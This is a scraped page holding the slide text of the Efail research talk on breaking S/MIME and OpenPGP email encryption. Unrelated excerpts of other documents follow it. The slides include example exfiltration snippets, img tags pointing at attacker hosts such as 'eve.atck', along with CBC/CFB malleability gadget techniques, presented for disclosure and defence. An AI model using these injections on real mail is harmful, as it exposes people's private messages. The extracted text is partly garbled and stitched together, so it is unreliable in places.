Efail: Breaking S/MIME and Openpgp Email Encryption Using Exfiltration Channels

Total Page:16

File Type:pdf, Size:1020Kb

Efail: Breaking S/MIME and Openpgp Email Encryption Using Exfiltration Channels Efail: Breaking S/MIME and OpenPGP Email Encryption using Exfiltration Channels Damian Poddebniak1, Christian Dresen1, Jens Müller2, 1 Münster University of Applied Sciences Fabian Ising1, Sebastian Schinzel1, Simon Friedberger3, 2 Ruhr University Bochum Juraj Somorovsky2, Jörg Schwenk2 3 NXP Semiconductors Damian Poddebniak1, Christian Dresen1, Jens Müller2, Fabian Ising1, Sebastian Schinzel1, Simon Friedberger3, Juraj Somorovsky2, Jörg Schwenk2 Motivation for using end-to-end encryption Nation state attackers • Massive collection of emails • Snowden’s global surveillance disclosure Breach of email provider / email account • Single point of failure • Aren’t they reading/analyzing my emails anyway? Insecure Transport • TLS might be used – we don’t know! 2 Two competing standards OpenPGP (RFC 4880) • Favored by privacy advocates • Web-of-trust (no authorities) S/MIME (RFC 5751) • Favored by organizations • Multi-root trust-hierarchies 3 History of secure email Mostly usability studies 4 Both standards use old crypto Both standards use old crypto Ciphertext C = Enc(M) C1 valid/invalid C2 valid/invalid … M = Dec(C) (repeated several times) 5 Old crypto has no negative impact CBC / CFB modes of operation used, but their usage is not exploitable Old crypto has no negative impact Assumption: Email is non-interactive 6 Backchannel • Any functionality that forces the email client to interact with the network • HTML/CSS <img src="http://efail.de"> • JavaScript XSSDisposition<object cheatdatasheets-Notification="ftp://efail.de-To: ">[email protected] • Email header Remote<style>@import-Attachment '//efail.de-URL: http://efail.de'</style> X...-Image-URL: http://efail.de • Attachment preview PDF, SVG, VCards, etc. OCSP,… CRL, intermediate certs • Certificate verification 7 Evaluation of backchannels in email clients Outlook Postbox Live Mail The Bat! eM Client W8Mail Windows IBM Notes Foxmail Pegasus Mulberry WLMail W10Mail Thunderbird KMail Claws Linux Evolution Trojitá Mutt Apple Mail macOS Airmail MailMate Backchannels Mail App CanaryMail Outlook iOS found K-9 Mail MailDroid Android R2Mail Nine GMail Yahoo! GMX Mail.ru ProtonMail Mailbox Webmail Outlook.com iCloud HushMail FastMail Mailfence ZoHo Mail Roundcube Horde IMP Exchange GroupWise Webapp RainLoop AfterLogic Mailpile ask user leak by default leak via bypass script execution 8 Attacker model 9 Overview 1. Malleability Gadget Attacks on S/MIME 2. Malleability Gadget Attacks on OpenPGP 3. Direct Exfiltration Attacks 4. Responsible Disclosure 5. Conclusions 10 S/MIME uses CBC Source: wikipedia • Cipher Block Chaining mode of operation • Not authenticated • Vulnerable to many attacks (TLS, XML Encryption, SSH) • Basic problem: malleability Malleability of CBC C0 C1 C2 decryption decryption P0 P1 12 Malleability of CBC C0' C1 C2 decryption decryption Content-type: te xt/html\nDear Bob P0' P1 13 Malleability of CBC C0' C1 C2 decryption decryption Zontent-type: te xt/html\nDear Bob P0' P1 14 Malleability of CBC C0 ⊕ P0 C1 C2 decryption decryption 0000000000000000 xt/html\nDear Bob P0' P1 CBC Gadget 15 Malleability of CBC C0 ⊕ P0 ⊕ Pc C1 C2 decryption decryption <img src=”ev.il/ xt/html\nDear Bob P0' P1 16 Malleability of CBC C0 C1' C2 decryption decryption Content-type: te Zt/html\nDear Bob P0' P1' 17 Malleability of CBC C0 C1' C2 decryption decryption ???????????????? Zt/html\nDear Bob P0' P1' 18 Practical Attack against S/MIME Content-type: te xt/html\nDear Sir or Madam, the se ecret meeting wi Original Crafted ???????????????? <img " ???????????????? " src="efail.de/ Content-type: te xt/html\nDear Sir or Madam, the se ecret meeting wi ???????????????? "> 19 Practical Attack against S/MIME 20 Overview 1. Malleability Gadget Attacks on S/MIME 2. Malleability Gadget Attacks on OpenPGP 3. Direct Exfiltration Attacks 4. Responsible Disclosure 5. Conclusions 21 OpenPGP • OpenPGP uses a variation of CFB-Mode • Uses integrity protection • Compression is enabled by default Ci Ci+1 Ci X encryption encryption encryption encryption ? ? ? ? ? ? ? ? random plaintext Pi (known) Pi-1 Pc (chosen) 22 OpenPGP – integrity protection • Integrity protection is performed by adding an MDC at the end of the packet TAG 18 LENGTH <encrypted> TAG 8 LENGTH Tag Type of PGP packet <compressed> TAG 11 LENGTH 8 CD: Compressed Data Packet Content-Type:multipart/mixed; boundary=“ 9 SE: Symmetrically Encrypted Packet … … 11 LD: Literal Data Packet 18 SEIP: Symmetrically Encrypted and Integrity TAG 19 LENGTH Protected Packet efa3e9ca54f0879c5b187636c23b7de376a5ba41 19 MDC: Modification Detection Code Packet 23 RFC4880 on Modification Detection Codes Defeating integrity protection Client Plugin (up to version) MDC Stripped MDC Incorrect SEIP -> SE Outlook 2007 GPG4WIN 3.0.0 Outlook 2010 GPG4WIN OutlookMDC 2013 StrippedGPG4WIN MDC Incorrect SEIP -> SE Outlook 2016 GPG4WIN Thunderbird Enigmail 1.9.9 Apple Mail (OSX) GPGTools 2018.01 Vulnerable Not Vulnerable 25 OpenPGP compression • Challenge: create chosen compressed plaintext • In a nutshell: • Our shortest exploit needs 11 bytes of known plaintext • The first 4 bytes are known header data • Remaining 7 bytes have to be guessed ? ? ? ? ? ? ? 26 Guessing bytes in compression PGP-encrypted Facebook password recovery • 211 guesses to break every email PGP-encrypted Enron dataset • 500 guesses to break 41% of the emails Multiple guesses per email possible • Up to 1000 MIME parts per email 27 Defeating Deflate Exploiting the compression algoritm af 02 78 9c ... a3 ... ? ? ? ? ? ? ? ? <img ? ? ? ? ? ? ? ? src=“efail.de/ ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? B1 B2 B3 B4 … random plaintext random plaintext random plaintext Uncom pressed segm ent Com pressed segm ent with fragm ents with backreferences af 02 78 9c ... a3 ... <img src=“efail.de/ 34 Overview 1. Malleability Gadget Attacks on S/MIME 2. Malleability Gadget Attacks on OpenPGP 3. Direct Exfiltration Attacks 4. Responsible Disclosure 5. Conclusions 35 Direct exfiltration • This attack is possible since 2003 in Thunderbird • Independent of the applied encryption scheme • Somewhat fixable in implementation • But works directly in … • Apple Mail / Mail App • Thunderbird • Postbox • … • The standards do not give any definition for that! 36 Direct exfiltration Alice’s mail program encrypts the email Alice writes a Mail to Bob Encrypting From: Alice To: Bob -----BEGIN PGP MESSAGE----- Dear Bob, hQIMA1n/0nhVYSIBARAAiIsX1QsH the meeting tomorrow will be ZObL2LopVexVVZ1uvk3wieArHUg… at 9 o‘clock. -----END PGP MESSAGE----- 37 Direct exfiltration Eve’s attack E-Mail Eve modifiescaptures the emailencrypted and sendsmail between it to Bob Alice or Alice and Bob From: Eve To: Bob Content-Type: text/html Original E-Mail <img src="http://eve.atck/ From: Alice To: Bob -----BEGIN PGP MESSAGE----- hQIMA1n/0nhVYSIBARAAiIsX1QsH ZObL2LopVexVVZ1uvk3wieArHUg… Content-Type: text/html -----END PGP MESSAGE----- "> 38 Direct exfiltration Bob’s mail program puts the Eve’s attack E-Mail decryptsclear text the back email into the body From: Eve To: Bob Decrypting Content-Type: text/html <img src="http://eve.atck/ -----BEGIN PGP MESSAGE----- Dear Bob, hQIMA1n/0nhVYSIBARAAiIsX1QsH the meeting tomorrow will be ZObL2LopVexVVZ1uvk3wieArHUg… at 9 o‘clock. -----END PGP MESSAGE----- Content-Type: text/html "> 39 Direct exfiltration Eve’s attack E-Mail From: Eve To: Bob Content-Type: text/html GET<img /Dear%20Bob%2C%0D%0Athesrc="http://eve.atck/ %20meeting%20tomorrow%20willsrc="http://eve.atck/Dear Dear%20be%20at%209%20o%E2%80%98cBob, Bob, thelock.meeting tomorrow will be at 9 o‘clock..“> Eve Content-Type: text/html "> 40 Overview 1. Malleability Gadget Attacks on S/MIME 2. Malleability Gadget Attacks on OpenPGP 3. Direct Exfiltration Attacks 4. Responsible Disclosure 5. Conclusions 41 S/MIME OpenPGP 42 In May many clients still vulnerable • Direct exfiltration attacks against Apple Mail or Thunderbird Responsible disclosure One day before disclosure … It did not work well • Embargo broken • Community angry • Of course, nobody read the paper • Support from the crypto/security community Impact on the standards S/MIME standard draft - draft-ietf-lamps-rfc5751-bis-11 • References EFAIL paper • Recommends the usage of authenticated encryption with AES-GCM OpenPGP standard draft - draft-ietf-openpgp-rfc4880bis-05 • Deprecates Symmetrically Encrypted (SE) data packets • Proposes AEAD protected data packets • Implementations should not allow users to access erroneous data 47 Overview 1. Malleability Gadget Attacks on S/MIME 2. Malleability Gadget Attacks on OpenPGP 3. Direct Exfiltration Attacks 4. Responsible Disclosure 5. Conclusions 48 Conclusions • Introduced malleability gadgets Thank you! • Self-exfiltrating plaintexts Questions? • Evaluation of backchannels • Crypto standards need to evolve • Current S/MIME is broken • OpenPGP needs clarification https://www.efail.de/ • Secure HTML email is challenging 49.
Recommended publications
  • Free Email Software Download Best Free Email Client 2021
    free email software download Best Free Email Client 2021. This article is all about best free email clients and how they can help you be more productive. We also talk about Clean Email, an easy-to-use email cleaner compatible with virtually all major email services. But before we go over the best email clients for 2021, we believe that we should first explain what advantages email clients have over web-based interfaces of various email services. Clean Email. Take control of your mailbox. What Is an Email Client and Why Should I Use One? If you’re like most people, you probably check your email at least once every day. And if you’re someone whose work involves communication with customers, clients, and coworkers, the chances are that you deal with emails all the time. Even though we spend so much time writing, forwarding, and managing emails, we hardly ever pause for a moment and think about how we could improve our emailing experience. We use clunky web interfaces that are not meant for professional use, we accept outdated applications as if alternatives didn’t exist, and we settle for the default email apps on our mobile devices even though app stores are full of excellent third-party email apps. Broadly speaking, an email client is a computer program used to access and manage a user’s email. But when we use the term email client in this article, we only mean those email clients that can be installed on a desktop computer or a mobile device—not web-based email clients that are hosted remotely and are accessible only from a web browser.
    [Show full text]
  • Mesačný Prehľad Kritických Zraniteľností Máj 2018
    Mesačný prehľad kritických zraniteľností Mesačný prehľad kritických zraniteľností Máj 2018 1. Operačné systémy Microsoft Windows V máji spoločnosť Microsoft opravila 4 kritické zraniteľnosti operačného systému Microsoft Windows. Zraniteľnosti CVE-2018-0959 a CVE-2018-0961 môžu spôsobiť vykonanie škodlivého kódu na diaľku. Prvá z nich je spôsobená nesprávnym overovaním vstupu Windows Hyper-V na serveri od autentifikovaného používateľa na hostiteľskom operačnom systéme. Druhá sa týka overovania paketových dát v SMB protokole systému Windows Hyper-V. Na zneužitie týchto zraniteľností musí útočník spustiť špeciálne vytvorenú aplikáciu, ktorá umožní zneužitie týchto zraniteľností. Úspešný útočník následne môže vykonať ľubovoľný kód pomocou Windows Hyper-V. Našli sa aj zraniteľnosti CVE-2018-8120 a CVE-2018-8174 taktiež umožňujúce vzdialené vykonávanie kódu či zvýšenie privilégií, ktoré sú bližšie popísané aj v našom varovaní. Zraniteľné systémy: Windows 10 for 32-bit Systems Windows 10 for x64-based Systems Windows 10 Version 1511 for 32-bit Systems Windows 10 Version 1511 for x64-based Systems Windows 10 Version 1607 for 32-bit Systems Windows 10 Version 1607 for x64-based Systems. Windows 10 Version 1703 for 32-bit Systems Windows 10 Version 1703 for x64-based Systems Windows 10 Version 1709 for 32-bit Systems Windows 10 Version 1709 for x64-based Systems Windows 10 Version 1803 for 32-bit Systems Windows 10 Version 1803 for x64-based Systems Windows 7 for 32-bit Systems Service Pack 1 Windows 7 for x64-based Systems Service Pack 1 Windows
    [Show full text]
  • Business SITUS Address Taxes Owed # 11828201655 PROPERTY HOLDING SERV TRUST 828 WABASH AV CHARLOTTE NC 28208 24.37 1 ROCK INVESTMENTS LLC
    Business SITUS Address Taxes Owed # 11828201655 PROPERTY HOLDING SERV TRUST 828 WABASH AV CHARLOTTE NC 28208 24.37 1 ROCK INVESTMENTS LLC . 1101 BANNISTER PL CHARLOTTE NC 28213 510.98 1 STOP MAIL SHOP 8206 PROVIDENCE RD CHARLOTTE NC 28277 86.92 1021 ALLEN LLC . 1021 ALLEN ST CHARLOTTE NC 28205 419.39 1060 CREATIVE INC 801 CLANTON RD CHARLOTTE NC 28217 347.12 112 AUTO ELECTRIC 210 DELBURG ST DAVIDSON NC 28036 45.32 1209 FONTANA AVE LLC . FONTANA AV CHARLOTTE 22.01 1213 W MOREHEAD STREET GP LLC . 1207 W MOREHEAD ST CHARLOTTE NC 28208 2896.87 1213 W MOREHEAD STREET GP LLC . 1201 W MOREHEAD ST CHARLOTTE NC 28208 6942.12 1233 MOREHEAD LLC . 630 402 CALVERT ST CHARLOTTE NC 28208 1753.48 1431 E INDEPENDENCE BLVD LLC . 1431 E INDEPENDENCE BV CHARLOTTE NC 28205 1352.65 160 DEVELOPMENT GROUP LLC . HUNTING BIRDS LN MECKLENBURG 444.12 160 DEVELOPMENT GROUP LLC . STEELE CREEK RD MECKLENBURG 2229.49 1787 JAMESTON DR LLC . 1787 JAMESTON DR CHARLOTTE NC 28209 3494.88 1801 COMMONWEALTH LLC . 1801 COMMONWEALTH AV CHARLOTTE NC 28205 9819.32 1961 RUNNYMEDE LLC . 5419 BEAM LAKE DR UNINCORPORATED 958.87 1ST METROPOLITAN MORTGAGE SUITE 333 3420 TORINGDON WY CHARLOTTE NC 28277 15.31 2 THE MAX SALON 10223 E UNIVERSITY CITY BV CHARLOTTE NC 28262 269.96 201 SOUTH TRYON OWNER LLC 201 S TRYON ST CHARLOTTE NC 28202 396.11 201 SOUTH TRYON OWNER LLC 237 S TRYON ST CHARLOTTE NC 28202 49.80 2010 TRYON REAL ESTATE LLC . 2010 S TRYON ST CHARLOTTE NC 28203 3491.48 208 WONDERWOOD TREE PRESERVATION HO .
    [Show full text]
  • Znetlive SSL Compatible Applications, Platforms & Operating
    ZNetLive SSL Compatible Applications, Platforms & Operating Systems Certificate Authority Root Apple MAC OS 9.0+ (circa 2002), includes 10.5.X and 10.6.X Future proof at 2048 bit, embedded in all Microsoft Windows XP, Vista, 7 and 8 (all devices and browsers and capable of upgrading versions inc 32/64 bit) weak encryption to a strong one is the most reliable Certificate Authority Root-GlobalSign. It is very important to ensure a flawless interaction of your online solutions with Default API Support within Hosting Control customers making connection with your web Panels server, reading emails, trusting your e- Ubersmith documents or running your code. Every WHMCS standard machine that uses trust of Public Key Infrastructure (PKI), e.g. S/MIME, SSL/TLS, Document Signing and Code Signing, has GlobalSign’s Root Certification present in it. Email Clients (S/MIME) ZNetLive’s SSL Certificates authenticated by GlobalSign have 2048 bit strength throughout Mulberry Mail complete Digital Certificate portfolio and Microsoft Outlook 99+ comply with recommendations of National Microsoft Entourage (OS/X) Institute of Standards and Technology (NIST) Qualcomm Eudora 6.2+ according to which all cryptographic keys Mozilla Thunderbird 1.0+ should be 2048 bit strength from 2011 onwards. Mail.app Anything weaker than 2048 bit encryption is Lotus Notes (6+) considered insecure. Because of this, the Netscape Communicator 4.51+ Certification Authorities and Browsers insists The Bat that all the EV SSL Certificates should be 2048 Apple Mail bit encryption.
    [Show full text]
  • MTA STS Improving Email Security.Pdf
    Improving Email Security with the MTA-STS Standard By Brian Godiksen An Email Best Practices Whitepaper CONTENTS Executive Overview 03 Why Does Email Need Encryption in Transit? 04 The Problem with “Opportunistic Encryption” 07 The Anatomy of a Man-in-the-Middle Attack 08 The Next Major Step with Email Encryption: MTA-STS 10 What Steps Should Senders Take to Adopt MTA-STS? 11 About SocketLabs 12 Brian Godiksen Brian has been helping organizations optimize email deliverability since joining SocketLabs in 2011. He currently manages a team of deliverability analysts that consult with customers on best infrastructure practices, including email authentication implementation, bounce processing, IP address warm-up, and email marketing list management. Brian leads the fight against spam and email abuse at SocketLabs by managing compliance across the platform. He is an active participant in key industry groups such as M3AAWG and the Email Experience Council. You can read more of Brian’s content here on the SocketLabs website. ©2019 SocketLabs 2 Executive The Edward Snowden leaks of 2013 opened many peoples’ eyes to the fact that mass surveillance was possible by Overview intercepting and spying on email transmissions. Today, compromised systems, database thefts, and technology breaches remain common fixtures in news feeds around the world. As a natural response, the technology industry is rabidly focused on improving the security and encryption of communications across all platforms. Since those early days of enlightenment, industry experts have discussed and attempted a variety of new strategies to combat “pervasive monitoring” of email channels. While pervasive monitoring assaults can take many forms, the most prominent forms of interference were man-in-the-middle (MitM) attacks.
    [Show full text]
  • Zix Wins 5-Vendor Email Encryption Shootout Email Encryption Has Come a Long Way Since Our Last Review
    Reprint THE CONNECTED ENTERPRISE MARCH 13, 2017 Zix wins 5-vendor email encryption shootout Email encryption has come a long way since our last review BY DAVID STROM, NETWORK WORLD terms of the flexibility of various encryption While these personal encryption products protocols used, along with DLP features that are improvements, there are also steps mail encryption products have are built-in along with a simple and single forward for the enterprise encryption email made major strides since we last pricing structure -- all things that Zix excels. user. Some products, such as Zix, hide the looked at them nearly two years All of these encryption products will cost encryption key process entirely from the ago. They have gotten easier you a few dollars a month per user. While user, so well that you might not even know to use and deploy, thanks to a that doesn’t sound like much, if you have that an encrypted message has passed from Ecombination of user interface and encryption an installation of several thousand users, sender to recipient. key management improvements, and are at the price tag could add up. However, the Others, such as Virtru and HPE/Voltage, the point where encryption can almost be alternative is having your email stream use identity-based encryption management called effortless on the part of the end user. available to anyone with a simple collection to verify a new recipient in their systems. Our biggest criticism in 2015 was that the of tools that even teens can master. Once a user new to these products products couldn’t cover multiple use cases, clicks on a confirmation email, they are such as when a user switches from reading Trends and bright spots forever allowed access, their emails are emails on their smartphone to moving to a In 2015, we said that gateways may have automatically decrypted, and there is no webmailer to composing messages on their fallen out of favor, but that trend has been need for any further effort to keep track of or Outlook desktop client.
    [Show full text]
  • The Sweet Setup -- Airmail Tips and Tricks Copy
    Airmail Tips & Tricks Written and published by the fine folks at The Sweet Setup. thesweetsetup.com 1 of 16 About The Sweet Setup We enjoy spending an inordinate amount of time and energy to research, test, and find the very best apps. The Sweet Setup exists to highlight the software that has proven to be the best, not necessarily the newest. Who wants just any weather app? Not us. We want the best! And so do you. That’s why our goal is to help you (and ourselves) find the best apps for your iPhone, iPad, and Mac. Our Other Websites The Focus Course: Get clarity about your goals and priorities, build traction on your side projects, stop procrastinating, bring your life into focus. Tools & Toys: Gear guides and reviews every day. Time Management Training: Scheduling, prioritizing, and time management training to help you get (and stay) in control of your time an attention. 2 of 16 Airmail Tips & Tricks 1. About Airmail for Mac 2. Using Send & Archive 3. How to Snooze Messages 4. How to use Quick Reply 5. Marking Messages as Spam 6. Using and Customizing the Swipe Gestures for Airmail on iOS All written content and photography is original and copyright 2017 Blanc Media, LLC Airmail, the Airmail logo, and its design are registered trademark of Bloop. airmailapp.com, bloop.info The Sweet Setup and Blanc Media are not affiliated with Airmail or Bloop. 3 of 16 4 of 16 About Airmail Airmail is marketed as being a “lightning-fast email client for Mac,” and it certainly doesn’t disappoint.
    [Show full text]
  • Downloadable Email Program for My Pc 32 Best Free Email Clients
    downloadable email program for my pc 32 Best Free Email Clients. Here are 32 best free email client software . These let you manage and access all of your email accounts in one single place easily. All these email client software are completely free and can be downloaded to Windows PC. These free software offer various features, like: can be used with IMAP, SMTP, POP3 and Gmail, keeps your emails safe and secure, lets you open various emails simultaneously, provide protection from spam, lets you view your emails offline, manage and access all of your email accounts in one single place, supports PH, LDAP, IMAP4, POP3 and SMPT mail protocols etc. So, go through this list of free email client software and see which ones you like the most. Thunderbird. Thunderbird is a free and handy email client software for your computer. It can be used with IMAP, SMTP, POP3 and Gmail. It will also work with email accounts provided by MS Exchange Server. The user interface of Thunderbird is tabbed. It lets you open various emails simultaneously. Thunderbird keeps your emails safe and secure. It also has special filters for filtering the mail. Windows Live Mail. Windows Live Mail is a free email client for your computer. It works with various email accounts. It lets you access Yahoo, Gmail, Hotmail and emails from different servers which supports POP3 and SMTP. Its security features are excellent it will also provide protection from spam. You can also view your emails offline in this freeware. Zimbra Desktop. Zimbra Desktop is a free email client.
    [Show full text]
  • LEGAL TECHNOLOGY Insider
    CHARLES CHRISTIAN’s LEGAL TECHNOLOGY iNSIDER THE ESSENTIAL GUIDE TO WHAT’S HOT (AND WHAT’S NOT) IN LAW OFFICE SYSTEMS ➦ workgroup friendly office automation WORDPERFECT suite that should find a ready place in SET FOR JUNE law firm and IT suppliers’ fee earner desk- top development strategies. COMEBACK For advanced users, the suite has The legal world’s favourite word- Internet and multimedia enhancements. processing software WordPerfect is While more traditional wordprocessor scheduled to make its comeback in users should find the new “as you go” June with the launch of the new 32- features in WordPerfect 7 improve pro- IN THIS bit Windows 95 compliant Version 7.0. ductivity by allowing greater flexibility EDITIONÉ At the same time WordPerfect’s new over checking spelling, reformatting docu- owners Corel will also be launching ments and changing numbering. Microsoft to PerfectOffice 7.0, the latest upgrade In addition, the suite contains a Exchange Mail… 2 to the company’s all-in-one office copy of IBM’s VoiceType Control software automation suite. so users can actually control applications Shakespeare LEGAL TECHNOLOGY iNSIDER has by spoken commands, such as “open file”, looking for recently been looking at the pre-release “print document” etc. co-authors… 3 Beta 2 version of the software and while there remains the possibility of further ☞ Comment… A lot can happen in the LOTIES awards changes being made to the final version, two months between now and the provi- latest… 4 it is clear Corel is pulling out all the stops sional 6th June launch date but on first to ensure WordPerfect’s second coming impressions it seems Corel has devised a Roll your own returns the product to its former glory as wordprocessing/office suite that is more accounts with a market leader.
    [Show full text]
  • Arabic Domain Names
    Arabic Domain Names SaudiNIC’s Experiences and Initiatives Relate to UA Raed Alfayez, SaudiNIC ICANN 55, Marrakech, March 2016 Agenda • About SaudiNIC • SaudiNIC Previous Work – IDN Assessment reports – Raseel – An Arabic Email System • What's Next? About SaudiNIC • Administering the domain name space under: – (.sa) since 1995 .2010 since (.ﺔﯾدوﻌﺳﻟا) – • Operated by a government organization: – CITC (Communication and Information Technology Commission) • Coordinating with regional and international bodies in order to present the local community needs • Leading the local and regional communities efforts towards supporting Arabic language in Domain Names since 2001 (more than 15 years of experience) SaudiNIC Previous Work Arabic IDN pilot projects • GCC Pilot Project (2004-2005) • Arab League (2005 - 2009) Tools, algorithms and solutions to manage variants: • Master Key Algorithm • Filters • Variant Management System (VMS) IDN Assessment Reports Arabic Email Project (Raseel) IDN Assessment Reports Conducted and Published a number of IDN Assessment Reports: • IDN Top Level Domain Evaluations and Testing Report 2007 • with the cooperation of the Arabic Domain Name Pilot Project Team. • Arabic IDN Test Results for Browsers 2010 • Mozilla Firefox & Microsoft IE 2014 • IDN Assessment Report IDN Assessment Reports - 2014 • Goal: –to study and assess end-user experiences regarding IDNA implementations for Arabic domain names. • Covered many areas and behaviors • Developed –methodology for Test Case Modeling and Generation –online system to capture results IDN Assessment Reports - 2014 • IDNA support ≠ browsers’ address bars support. • User acceptance for IDNA is less than 1% (Excluding address bar in some web browsers) – It’s been more than 10 years since the publication of IDNA RFCs, and still less than 1%! • How long do we need for Internationalized Email (IDN Email) to be fully deployed! – Do we need to wait 10+ years to get a 1% acceptance! • RFCs are not enough, we need accelerators.
    [Show full text]
  • Jane Hutt: Businesses That Have Received Welsh Government Grants During 2011/12
    Jane Hutt: Businesses that have received Welsh Government grants during 2011/12 1 STOP FINANCIAL SERVICES 100 PERCENT EFFECTIVE TRAINING 1MTB1 1ST CHOICE TRANSPORT LTD 2 WOODS 30 MINUTE WORKOUT LTD 3D HAIR AND BEAUTY LTD 4A GREENHOUSE COM LTD 4MAT TRAINING 4WARD DEVELOPMENT LTD 5 STAR AUTOS 5C SERVICES LTD 75 POINT 3 LTD A AND R ELECTRICAL WALES LTD A JEFFERY BUILDING CONTRACTOR A & B AIR SYSTEMS LTD A & N MEDIA FINANCE SERVICES LTD A A ELECTRICAL A A INTERNATIONAL LTD A AND E G JONES A AND E THERAPY A AND G SERVICES A AND P VEHICLE SERVICES A AND S MOTOR REPAIRS A AND T JONES A B CARDINAL PACKAGING LTD A BRADLEY & SONS A CUSHLEY HEATING SERVICES A CUT ABOVE A FOULKES & PARTNERS A GIDDINGS A H PLANT HIRE LTD A HARRIES BUILDING SERVICES LTD A HIER PLUMBING AND HEATING A I SUMNER A J ACCESS PLATFORMS LTD A J RENTALS LIMITED A J WALTERS AVIATION LTD A M EVANS A M GWYNNE A MCLAY AND COMPANY LIMITED A P HUGHES LANDSCAPING A P PATEL A PARRY CONSTRUCTION CO LTD A PLUS TRAINING & BUSINES SERVICES A R ELECTRICAL TRAINING CENTRE A R GIBSON PAINTING AND DEC SERVS A R T RHYMNEY LTD A S DISTRIBUTION SERVICES LTD A THOMAS A W JONES BUILDING CONTRACTORS A W RENEWABLES LTD A WILLIAMS A1 CARE SERVICES A1 CEILINGS A1 SAFE & SECURE A19 SKILLS A40 GARAGE A4E LTD AA & MG WOZENCRAFT AAA TRAINING CO LTD AABSOLUTELY LUSH HAIR STUDIO AB INTERNET LTD ABB LTD ABER GLAZIERS LTD ABERAVON ICC ABERDARE FORD ABERGAVENNY FINE FOODS LTD ABINGDON FLOORING LTD ABLE LIFTING GEAR SWANSEA LTD ABLE OFFICE FURNITURE LTD ABLEWORLD UK LTD ABM CATERING FOR LEISURE LTD ABOUT TRAINING
    [Show full text]
  • Servicio De Mensajería De Correo Utilizando Software Libre Para
    Servicio de mensajería de correo utilizando software libre para mejorar el tiempo de respuesta de atención Tesis para optar el Título de Ingeniero de Sistemas y Cómputo Presentado por César Antonio Rojo López Asesor Dr. Santiago Raúl Gonzales Sánchez Lima – Perú Noviembre de 2020 DEDICATORIA Dedico este trabajo a mi familia particularmente a mis padres Mercedes López de Rojo y César Rojo Fernando como también a mi prometida Ximena Veliz que dia a dia me dan fuerza y motivacin para seguir adelante, como también al Gerente General de TecnoWeb Latam Diego Benavente por brindarme todas las herramientas para la implementación tecnologcia. 2 ÍNDICE ÍNDICE DE FIGURAS ............................................................................................................................. 5 INDICE DE TABLAS ............................................................................................................................... 7 RESUMEN ................................................................................................................................................. 8 ABSTRACT ............................................................................................................................................... 9 INTRODUCCIÓN ................................................................................................................................... 10 CAPÍTULO I: PLANTEAMIENTO DEL PROBLEMA ..................................................................... 12 1.1. Situación Problemática ..........................................................................................................
    [Show full text]